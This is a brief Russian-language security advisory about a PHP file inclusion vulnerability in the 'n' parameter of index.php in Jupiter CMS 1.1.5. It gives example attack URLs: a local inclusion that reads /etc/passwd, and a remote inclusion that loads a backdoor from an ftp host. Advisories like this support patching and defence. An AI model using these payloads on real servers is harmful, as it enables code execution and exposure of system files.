Программа: Jupiter CMS 1.1.5

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «n» сценарием index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости требует выключение опции " magic_quotes_gpc" в конфигурационном файле PHP.

Примеры:

LFI: http://<host><path>/index.php?n=/etc/passwd%00
RFI: http://<host><path>/index.php?n=ftp://user:password@example.com/backdoor



Оставить мнение